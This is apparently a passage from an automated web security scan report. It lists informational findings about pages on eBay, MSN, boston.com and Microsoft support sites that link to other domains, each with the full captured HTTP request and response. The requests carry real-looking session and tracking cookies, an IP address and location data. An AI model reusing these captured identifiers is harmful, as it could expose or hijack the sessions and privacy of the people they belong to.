Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /admeld_sync?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: pixel.invitemedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: uid=2ecd6c1e-5306-444b-942d-9108b17fd086; subID="{}"; impressions="{\"580192\": [1308590348+ \"162762637887060014\"+ 29710+ 11561+ 12332]}"; camp_freq_p1="eJzjkuH4vZBVgFGip+nfexYFRo2epc0fWAwYLcB8AJyQC1E="; exchange_uid="eyIyIjogWyI3MjEyMjgyNzE3ODA4MzkwMjAwIiwgNzM0MzIxXSwgIjQiOiBbIkUwIiwgNzM0MzA4XX0="; io_freq_p1="eJzjEua4ECrAKNHT9O89iwGjBZgGAEeuB9s="; segments_p1="eJzjYuFYs4uJi5ljcSKQ+McBJKYqAYnnuVycHPejBY40HfvIwsXCMesQMwDhcQvD"; partnerUID="eyIxMTUiOiBbIjRlMDcxMmFjNjIyYzY0NjEiLCB0cnVlXSwgIjE5OSI6IFsiNUY0MTJDQzZCQTA4RkQ2N0FBNENDNzVBMDA1N0RBMjUiLCB0cnVlXSwgIjE5MSI6IFsiNzM1MjgyMTM0NDMwMDgwMTA4MSIsIHRydWVdLCAiMTUiOiBbIjAwMzAwMTAwMTk4MDAwMDg4NTg1OSIsIHRydWVdfQ=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 19 Jul 2011 20:43:03 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Tue, 19-Jul-2011 20:42:43 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 257

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=300&external_user_id=2ecd6c1e-5306-444b-942d-9108b17fd086&Expiration=1311540183&custom_user_segments=%2C12451%2C14055%2C40236%2C4373%2C57626%2C1150%2C11743"/>');

20.36. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&ID=E361C23374E642C998D8ABA7166A75EC&MUID=E361C23374E642C998D8ABA7166A75EC&PG=OOLSCA&AP=1089 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=e9b0b7965c774fdb94f4dbbf73989380; CC=US; CULTURE=EN-US; v1st=D4335FAB02FF2C98; ATC_ID=173.193.214.243.1307039206918742; VWCUKP300=L123100/Q72318_13861_1563_060211_1_060311_443106x442830x060211x1x1/Q73186_13384_1473_060111_1_061517_449169x449165x060111x1x1; __qca=P0-1267859454-1307060745444; MSNMOBREP=dcecbf9971484c8dbc4017eb007d89c3; __switchTo5x=94; __unam=7a54b75-130adfe6f89-5d6f1b4f-2; MUID=E361C23374E642C998D8ABA7166A75EC; MSNTVID=e9b0b7965c774fdb94f4dbbf73989380; mh=LENOVO; Sample=93; SRCHHPGUSR=AS=1; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 857
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8941475-T49420321-C10000000000050600
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Tue, 19 Jul 2011 15:19:23 GMT
Content-Length: 857


//<![CDATA[
function getRADIds() { return{"adid":"10000000000050600","pid":"8941475","targetid":"49420321"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);}

...[SNIP]...
<a href="http://g.msn.com/2AD0004Z/10000000000050600.1??PID=8941475&amp;UIT=G&amp;TargetID=49420321&amp;AN=538001986&amp;PG=OOLSCA&amp;ASID=6f30171621d74edaaa12a46f89c99ac2" target="_blank"><img src="http://ads2.msads.net/CIS/119/000/000/000/017/244.jpg" width="300" height="250" alt="Buy Microsoft Office 2010" border="0" /></a>
...[SNIP]...

20.37. http://rmedia.boston.com/RealMedia/ads/adstream_mjx.ads/www.boston.com/homepage/default/1108156392@TOP,INTRO,CENTRAL,FOOTER,MICRO1,MICRO2,MICRO3,EXTRA,SPONSOR,TILE1,HEADLINE1,HEADLINE2,LOGO1,LOGO2,LOGO3,LOGO4,LOGO5,LOGO10,LOGO8,LOGO14,BILLBOARD,LOGO9,MISC1,MISC2,MISC3,MISC4,MISC5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rmedia.boston.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.boston.com/homepage/default/1108156392@TOP,INTRO,CENTRAL,FOOTER,MICRO1,MICRO2,MICRO3,EXTRA,SPONSOR,TILE1,HEADLINE1,HEADLINE2,LOGO1,LOGO2,LOGO3,LOGO4,LOGO5,LOGO10,LOGO8,LOGO14,BILLBOARD,LOGO9,MISC1,MISC2,MISC3,MISC4,MISC5

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /RealMedia/ads/adstream_mjx.ads/www.boston.com/homepage/default/1108156392@TOP,INTRO,CENTRAL,FOOTER,MICRO1,MICRO2,MICRO3,EXTRA,SPONSOR,TILE1,HEADLINE1,HEADLINE2,LOGO1,LOGO2,LOGO3,LOGO4,LOGO5,LOGO10,LOGO8,LOGO14,BILLBOARD,LOGO9,MISC1,MISC2,MISC3,MISC4,MISC5? HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7; RMFD=011QK73VO205zQN|O105zfl

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:41:51 GMT
Server: Apache
Set-Cookie: RMFD=011QjH71; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 21371
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: application/x-javascript
Connection: Keep-Alive

function OAS_RICH(position) {
if (position == 'TOP') {
document.write ('<A HREF="http://rmedia.boston.com/RealMedia/ads/click_lx.ads/www.boston.com/homepage/default/L31/214936665/TOP/boston/c_colonial
...[SNIP]...
<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.q.boston/be_home;sz=728x90;ord=84105094?" type="text/javascript"></script>
...[SNIP]...
<noscript><a href="http://a.collective-media.net/jump/q1.q.boston/be_home;sz=728x90;ord=84105094?" target="_blank"><img src="http://a.collective-media.net/ad/q1.q.boston/be_home;sz=728x90;ord=84105094?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
stream_lx.ads/www.boston.com/homepage/default/1524696595/MISC3/boston/default/empty.gif/726348573830334b61734941426a4977?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>');
}
if (position == 'MISC4') {
document.write ('<script type="text/javascript" src="http://tags.crwdcntrl.net/c/520/cc.js"></script>
...[SNIP]...

20.38. https://signin.ebay.com/ws/eBayISAPI.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://signin.ebay.com
Path:   /ws/eBayISAPI.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ws/eBayISAPI.dll?SignIn&ru=http%3A%2F%2Foffer.ebay.com%2Fws%2FeBayISAPI.dll%3FBinConfirm%26item%3D120749940240%26quantity%3D1%26fb%3D1%26frompage%3D4340%26rev%3D3%26BidBinInfo%3D%253CbidInfo%253E%253CID%253E120749940240%253C%252FID%253E%253CMB%253E%253C%252FMB%253E%253CQTY%253E1%253C%252FQTY%253E%253C%252FbidInfo%253E&pageType=2143&onepagereg=1&item=120749940240&ICurl=https%3A%2F%2Fsecurethumbs.ebay.com%2Fpict%2F1207499402408080.jpg&ICtitle=U2+360+Tour+2+Tickets+sec345+New+Jersey+Wed+July+2011&ICdateMedium=Aug-13-11&ICtimeLong=16%3A29%3A46+PDT&gch=1&gchru=https%3A%2F%2Fpayments.ebay.com%2Fws%2FeBayISAPI.dll%3FGuestCheckoutProcessor%26item%3D120749940240%26quantity%3D1%26transactionid%3D-1%26rev%3D3 HTTP/1.1
Host: signin.ebay.com
Connection: keep-alive
Referer: http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120749940240+&clk_rvr_id=248601715093&item=120749940240
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500701ef^cguid/3666b2e01300a47a44d622a6ffc19372500701ef^trm/svid%3D94316858148500701ef^; ns1=BAQAAATErF7ITAAaAANgARlAHAfFjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wh+8/E+zDKMcCgsoubg41npdHFIQ*; cssg=43ae68ff1310a02680b5d7a5ffb89bda; s=CgAD4ACBOJx/xNDNhZTY4ZmYxMzEwYTAyNjgwYjVkN2E1ZmZiODliZGEBSgAYTicf8TRlMjVjZTcxLjAuMS4xMS44MS4wLjAuMaysycM*; nonsession=CgAAIABxOTVtxMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi8/xYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXVeTEBTAAYUAcB8TRlMjVjZTcxLjAuMS4xMS43OC4zLjAuMUqr+U4*; lucky9=3520182; dp1=bvrvi/1%7C0%7C120749940240%7C4e32fd71^u1p/QEBfX0BAX19AQA**500701f1^tzo/12c51e8357a^pbf/#20000000000000000051e8357a^idm/14e272014^; ds2=sotr/b13qzzzzzLCz^ssts/1311100657078^; ebay=%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Esbf%3D%23a0000100000%5Ejs%3D1%5Elrtjs%3D0.8%5Ecos%3D9%5Epsi%3DArmkOaAs*%5E

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ds2=asotr/b13qzzzzzLCz^; Domain=.ebay.com; Path=/
Set-Cookie: ebay=%5Elrtjs%3D0.8%5Esbf%3D%23a0000000000%5Ecos%3D9%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5Edv%3D4e25cf41%5E; Domain=.ebay.com; Path=/
Set-Cookie: dp1=bpbf/%23200010000000000004500702dd^vrvi/1%7C0%7C120749940240%7C4e32fe5d^tzo/12c4e25dd6d^u1p/QEBfX0BAX19AQA**500702dd^idm/14e272014^; Domain=.ebay.com; Expires=Thu, 18-Jul-2013 18:39:25 GMT; Path=/
Set-Cookie: ns1=BAQAAATErF7ITAAaAANgARlAHAt1jNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wbJTEBBjv23JNCoxnvDIMVQczNds*; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:39:25 GMT; Path=/
Set-Cookie: cssg=43ae68ff1310a02680b5d7a5ffb89bda; Domain=.ebay.com; Path=/
Set-Cookie: s=BAQAAATErF7ITAAWAAPgAIE4nIN00M2FlNjhmZjEzMTBhMDI2ODBiNWQ3YTVmZmI4OWJkYQFKABhOJyDdNGUyNWNmNWQuMC4xLjExLjgxLjAuMC4zABIACk4nIN10ZXN0Q29va2llmcFrAvoor5z2I5918AzcfwHQvMw*; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgAAIABxOTVxdMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi9DdYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXWZTMBTAAYUAcC3TRlMjVjZjVkLjAuMS4xMS43OC4zLjAuM3OY3B0*; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:39:25 GMT; Path=/
Set-Cookie: lucky9=3520182; Domain=.ebay.com; Expires=Sun, 17-Jul-2016 18:39:25 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Length: 20544
Date: Tue, 19 Jul 2011 18:39:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script></script><d
...[SNIP]...
</title><link rel="stylesheet" type="text/css" href="https://secureinclude.ebaystatic.com/v4css/z/ic/5i3fq334pyyxhijc5f3zqvjyc.css#GH-ZAM_RedesignSigninEbay_e731_13527566_en_US"><link rel="stylesheet" type="text/css" href="https://secureinclude.ebaystatic.com/v4css/z/il/u2dx44plymz1dfsknxx55os3q.css#SignInApp_SgnIn_e731_13527566_en_US"><!--[if lt IE 8]>
...[SNIP]...
<body id="body"><script type="text/javascript" src="https://secureinclude.ebaystatic.com/v4js/z/2m/losgv3zyn2yr5lrg0h4ik5yt4.js#SYS-ZAM_vjo_e731_1_13527320_en_US"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://secureinclude.ebaystatic.com/v4js/z/eu/341wgvdjgy2abb1qzf3cxflzf.js#SignInApp_SgnIn_e731_3_13527320_en_US"></script>
...[SNIP]...
<div class="GlobalNavigation" id="GlobalNavigation"><script type="text/javascript" src="https://secureinclude.ebaystatic.com/v4js/z/yo/gjzdlqbe2q0kzkzs2c4o43o5q.js"></script>
...[SNIP]...
<a id="EbayLogo" href="http://www.ebay.com" _sp="m570.l2586"><img src="https://securepics.ebaystatic.com/aw/pics/logos/logoEbay_x45.gif" alt="eBay" border="0" height="45" width="110"></img>
...[SNIP]...
<td><img src="https://securepics.ebaystatic.com/aw/pics/buy/trust/imgGuarantee_footer.gif" alt="eBay Buyer Protection" border="0" height="22" width="166"></img>
...[SNIP]...
<td class="g-pipe"><img src="https://securepics.ebaystatic.com/aw/pics/s.gif" height="10" width="1" alt=""><br>
...[SNIP]...
<br><img src="https://securepics.ebaystatic.com/aw/pics/s.gif" height="20" alt=""></td>
...[SNIP]...
<a href="javascript:;" id="verisign"><img src="https://securepics.ebaystatic.com/aw/pics/logos/logoNewVeriSign_100x65.gif" alt="Verisign Seal" border="0" height="65" width="100"></img>
...[SNIP]...
<b,RcmdId SignIn2,RlogId p4plaijkehq%60%3C%3Dpi%2Bpu%28be1%3C6%3Eg-13143b2065d-0x106--><script type="text/javascript" src="https://secureinclude.ebaystatic.com/v4js/z/e2/1kgeg22jaq0d3efjwymeoqcvm.js#SignInApp_SgnIn_e731_6_13527320_en_US"></script>
...[SNIP]...

20.39. http://srx.main.ebayrtm.com/rtm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://srx.main.ebayrtm.com
Path:   /rtm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /rtm?RtmCmd&a=json&p=699:1595:973:974:825:827:829:813:283:280:433:876:912:1650:1651&ph=0:0:0:0:0:0:0:0:0:0:0:0:0:0:0&ev=0:0:0:0:0:0:0:0:0:1:0:0:0:0:0&g=adb7b0cb1300a0aa15432be3fe5c7984&uf=0&c=1H4sIAAAAAAAAAFVU32vbMBB%2BL%2FR%2FMGxPQ011OkmWAnoobQctNA1N1m0QMG6itqaNHWxnWSB%2F%2FE6Sl25Pd9%2F9%2BHT%2BTvKn%2BdZnt9v3DGwGMEY1Fia7m80zwQFOTzbC5o4Hy8FFzLn7JjLUPJs32zYT2bxavvm%2Byzq%2FRKmyid9lt77t%2FD777leBev%2FBpRxYNFyaSIngnqr6ZfRc1l1dbkbLZk1hQONAgxDRzx0gV8G11oHgubRWciF5zGKcCVA4xUcplMYELeLYYOWRQA8pC27my66p%2F47O2Mwv%2B6qpGX0Am2zXT77NmudjWrC7pu5fWfgWdv3L13022z71%2B41nD83y7XzabM4v3nvf1qMhPQ%2B5y6Ze%2Bpb6H31NIs%2F6svfn07b5VVGcfeg05C%2BrntjLrs8etv2rb5%2BbdsV%2B%2BrJlQT52Ve7JoQN3jFBqmZTrRHTny1Wzey%2FrVRfOWVXboCSa3LXrt%2FvyovtyerKsViTgYss50fFk1f8wqCNsUknlztqRtTEmj50xhUlbg05i3ASCoepUbMSwlGgQ8gTTPhB0gnBkR5Du682P66ti%2BnBzeR0jOBQTFQGRGzCaTg%2BXBpSjO8jTugVVfiZVIo6BXMVWyYerkRs3rDHNP%2Bzn31Aok9LF4an9ePckuGCRGycj5gOmmsVYkSqmOCPpxsAl58UZklcAF3oxFgWAJot5CMjFWHJyOLVZsjoPPYVQCqlHSgNQWC2USUAUEnMRedHayKuxEKgCozTK5DEWvJQlIg3k0XBmGBHd%2FcbXi6hBUhzp4U7LF%2F9Y%2Bd1N79cT%2F7sPgjkj0%2Fs2wzv%2F2Ds%2FaiG0daS1YsAkMGFRMuTCMG2ZHrCyTMXS%2BE6VgvxgDVdGHuj6WmPNAZUAjfYguVZc5JE2H34q6XYIlM7EuA74DxaR6JCcBAAA&ord=1311100529004&e=USC:1&z=10&bw=1065&bh=723&cg=3666b2e01300a47a44d622a6ffc19372&enc=UTF-8&v=4&rnc=1&cb=vjo.dsf.assembly.VjClientAssembler._callback0&_vrdm=1311100538345 HTTP/1.1
Host: srx.main.ebayrtm.com
Proxy-Connection: keep-alive
Referer: http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120749940240+&clk_rvr_id=248601715093&item=120749940240
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: p4pphdlwc%3D9u%7E*t%28750d%7F2%3B-13143af2894-0x16f
Cache-Control: no-cache
Expires: 0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: A01=ABQAsMSUOAAAAAAAA5QuZsFGR1aCzORA; Domain=main.ebayrtm.com; Expires=Wed, 18-Jul-2012 18:36:18 GMT; Path=/rtm
Set-Cookie: M01=AAAACOACQgAE; Domain=main.ebayrtm.com; Expires=Wed, 18-Jul-2012 18:36:18 GMT; Path=/rtm
Set-Cookie: TC01=QBIPKvOUMBAAAEALjElDAAAAAAAQGAAABPkbGAktwIAS1aCQmdiAI; Domain=main.ebayrtm.com; Expires=Wed, 18-Jul-2012 18:36:18 GMT; Path=/rtm
Set-Cookie: RUA=D1AQAAATErF7ITAAYZchzOJQkAi5g%2BSQv3HKquZ2UrSVcKqhXgTu2GgiVmuErKwnKU3EYCaSfQGfK4sdpUu7I77It5rkG%2FanWo9FEvGie%2FiCjYBRuz%2Bu%2BZVv%2BrRQ6jwbWnCXh61dKhTowAEb5BjV%2B5KPdxZawyqSMM9g7Pi697Ovt5X8I8Ko%2Ffi7lhEUATgXz%2F%2Bm47HrMTGxCPDyF%2F3CYZ; Domain=main.ebayrtm.com; Expires=Thu, 18-Jul-2013 18:36:18 GMT; Path=/rtm
Set-Cookie: RUP=D1AQAAATErF7ITAAZS1xanS0Gk9aSM%2BmfKsGDaavNO5bWn4V4sSMYKOyEr1u1UDyQ*; Domain=ebayrtm.com; Expires=Thu, 18-Jul-2013 18:36:18 GMT; Path=/rtm
Set-Cookie: HT=1311100529004%02433%04165364%06142708%03829%04-1%060%03827%04-1%060%03825%04174461%06154106%03699%04-1%060%031595%04184241%06144661%03912%04-1%060%03974%04-1%060%03973%04187759%06167625%03876%04-1%060%031651%04-1%060%03813%04-1%060%031650%04-1%060%03283%04153923%0699446%03280%04153917%0699446; Domain=main.ebayrtm.com; Path=/rtm
Content-Type: application/x-javascript;charset=UTF-8
Content-Length: 72197
Date: Tue, 19 Jul 2011 18:36:17 GMT

try{vjo.dsf.assembly.VjClientAssembler._callback0([
{"id":"1595","mid":"184241","iid":"1457744126094707453","type":"html","width":"-1","height":"-1","content":"<body>\n <div class=\"pi\">\n<div cl
...[SNIP]...
<div class=\"fback\">\n        <a href=http://qu.ebay.com/survey?srvName=merchandising+%28merch1%29&variant_id=54252305&extparam=pageid%3d4340 onclick=\"onSurvey(this);return false;\">Feedback on our suggestions</a>
...[SNIP]...

20.40. https://support.discoverbing.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.discoverbing.com
Path:   /Default.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Default.aspx?&st=1&wfxredirect=1 HTTP/1.1
Host: support.discoverbing.com
Connection: keep-alive
Referer: http://onlinehelp.microsoft.com/en-us/bing/ff808415.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1307200261952; bingresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22DDINPROGRESS%22%2C%22url%22%3A%22http%253A//social.discoverbing.com/%22%2C%22timestamp%22%3A1307372850950%7D%2C%22lastinvited%22%3A1307372850950%2C%22userid%22%3A%221307361123212927392730955034%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5B%22p102855664%22%5D%7D; s_cc=true; s_vnum=1313680622771%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 19 Jul 2011 15:18:11 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: scrx=1; expires=Thu, 19-Jul-2012 15:18:11 GMT; path=/
Set-Cookie: MSIDCookie=b3669c96-3886-4430-9363-3e7a37fa4b8a; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Vary: Accept-Encoding
Content-Length: 23919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><hea
...[SNIP]...
<li Depth="5"><a title="Your Account" href="https&#58;&#47;&#47;ssl.bing.com&#47;rewards&#47;dashboard " target="_top" keys="85802_5 85802_4 " Depth="6"><!--start85805_0-->
...[SNIP]...
<li Depth="5"><a title="FAQ" href="https&#58;&#47;&#47;ssl.bing.com&#47;rewards&#47;faq&#47;questions" target="_top" keys="85803_5 85803_4 " Depth="6"><!--start85806_0-->
...[SNIP]...
<li Depth="5"><a title="Redemption Center" href="https&#58;&#47;&#47;ssl.bing.com&#47;rewards&#47;redeem" target="_top" keys="86400_5 86400_4 " Depth="6"><!--start86401_0-->
...[SNIP]...

20.41. http://support.microsoft.com/common/international.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.microsoft.com
Path:   /common/international.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /common/international.aspx?RDPATH=dm;en-us;select&target=assistance HTTP/1.1
Host: support.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; LBRN2DL=C; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; wedcsinc=2; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; gssSITE=gn; gssTHEME=gn; gssTOOLBAR=gn; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311077969178:ss=1311077969178; ST_GN_EN-US=4_0_0; fmsmemo=st=|13083; sdninc=1; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; 21661174-VID=16101514677756; 21661174-SKEY=5504769704751670663; HumanClickSiteContainerID_21661174=STANDALONE; fmshb=0,1311089271820; .ASPXANONYMOUS=H-iLPrp8zAEkAAAAZDAyNDdkNzctZmNiMi00NmEzLTk4OWUtMzA2ZDBjMjc1ZTQ2ge2m6gPIvXC__FwJp8cro5hNcDg1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ServerName: B07
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Date: Tue, 19 Jul 2011 15:27:46 GMT
Content-Length: 30214

<html lang="en-US"><head><meta name="ms.gsfxversion" content="7.6.9.0" /><meta name="ms.sup_cid" content="intercontact" /><meta name="ms.sup_cln" content="en-us" /><meta name="ms.sup_ct" content="gp"
...[SNIP]...
<img src="/library/images/support/CN/CPS_IE9_icon.png" alt="Get Internet Explorer 9 today. Free download." /> <a href="http://clk.atdmt.com/MRT/go/335774571/direct/01/">Get Internet Explorer 9 today. Free download.</a>
...[SNIP]...
</a>
